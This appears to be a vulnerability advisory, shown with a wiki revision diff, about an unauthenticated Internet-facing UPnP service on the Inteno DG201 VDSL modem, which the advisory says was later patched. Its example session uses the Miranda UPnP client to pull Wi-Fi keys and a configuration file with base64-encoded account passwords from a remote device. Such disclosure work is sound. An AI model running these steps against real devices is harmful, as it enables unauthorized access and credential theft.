2711
Comment:
|
3024
|
Deletions are marked like this. | Additions are marked like this. |
Line 5: | Line 5: |
DG201 VDSL-box has UPnP -service open to the Internet by default. Even if the box has set to bridge mode, VDSL-box will take own public IP from the Internet. | DG201 VDSL-box has some kind of UPnP -service open to the Internet by default. Even if the box has set to bridge mode, VDSL-box will take own public IP from the Internet. |
Line 7: | Line 7: |
From UPnP-service you can for example download device configuration which include passwords etc. It is also possible to change configuration in the device. Everything can be done without any authentication. | From UPnP-service you can for example download device configuration which include passwords for Wifi and Accounts in the box. It is also possible to change configuration in the device. All this can be done without any authentication. |
Line 79: | Line 79: |
== Update available == * https://www.dna.fi/documents/15182/76543/Inteno_DNA_DG201+ja+EG500_modeemin_paivitys.pdf/87f2f9da-9360-440e-8113-03f277d524f4 * https://www.dna.fi/documents/15182/76216/DG201A-W2U4U_4.06DNT0936.1_20140127/7f4c2113-32f2-422f-bdd5-e7a1062373c1 |
|
Line 82: | Line 84: |
* Mikko Kenttälä, Turmio @ IRCnet, mikko.kenttala@iki.fi | * Mikko Kenttälä, Turmio @ IRCnet, mikko.kenttala(ä)iki.fi |
Intro
This vulnerability is reported 2013-11-22 and it is fixed couple of month after that.
DG201 VDSL-box has some kind of UPnP -service open to the Internet by default. Even if the box has set to bridge mode, VDSL-box will take own public IP from the Internet.
From UPnP-service you can for example download device configuration which include passwords for Wifi and Accounts in the box. It is also possible to change configuration in the device. All this can be done without any authentication.
- Software version: DG201A-W2U4U_4.06DNT0934.2
Details
UPnP service can be found from port TCP 49431.
Get UPnP client and start using the service. I used miranda: https://code.google.com/p/miranda-upnp/
Example
I have manually added my public IP to the configuration which is basically list of hosts in python pickle.
$ python miranda.py -s upnp-inteno.mir Miranda v1.3 The interactive UPnP client Craig Heffner, http://www.devttys0.com Host data restored: [0] 10.0.2.187:8888 [1] 192.168.1.1:49431 [2] 192.168.1.1:49431 [3] 213.216.x.x:49431 [4] 85.131.x.x:49431 upnp> host get 3 Requesting device and service info for 213.216.x.x:49431 (this could take a few seconds)... Host data enumeration complete! upnp> host send 3 LANDevice WLANConfiguration GetSecurityKeys NewWEPKey3 : 1234567890123 NewWEPKey2 : 1234567890123 NewWEPKey1 : 1234567890123 NewWEPKey0 : 1234567890123 NewKeyPassphrase : NewPreSharedKey : abbaabba upnp> host send 3 InternetGatewayDevice DeviceConfig GetConfiguration NewConfigFile : <?xml version="1.0"?> <DslCpeConfig version="3.0"> <InternetGatewayDevice> <LANDeviceNumberOfEntries>1</LANDeviceNumberOfEntries> <WANDeviceNumberOfEntries>3</WANDeviceNumberOfEntries> <DeviceInfo> <ProvisioningCode>12345</ProvisioningCode> <FirstUseDate>2012-04-11T14:46:01+00:00</FirstUseDate> <VendorConfigFileNumberOfEntries>0</VendorConfigFileNumberOfEntries> </DeviceInfo> <X_BROADCOM_COM_SyslogCfg> <Status>Enabled</Status> <Option>local buffer and remote</Option> <LocalDisplayLevel>Debug</LocalDisplayLevel> <ServerIPAddress>10.0.0.1</ServerIPAddress> </X_BROADCOM_COM_SyslogCfg> <X_BROADCOM_COM_LoginCfg> <SupportPassword>ZG5hcjNzY3VlMTEyAA==</SupportPassword> <UserPassword>dXNlcgo=</UserPassword> </X_BROADCOM_COM_LoginCfg> ...
Update available
Contacts
- Mikko Kenttälä, Turmio @ IRCnet, mikko.kenttala(ä)iki.fi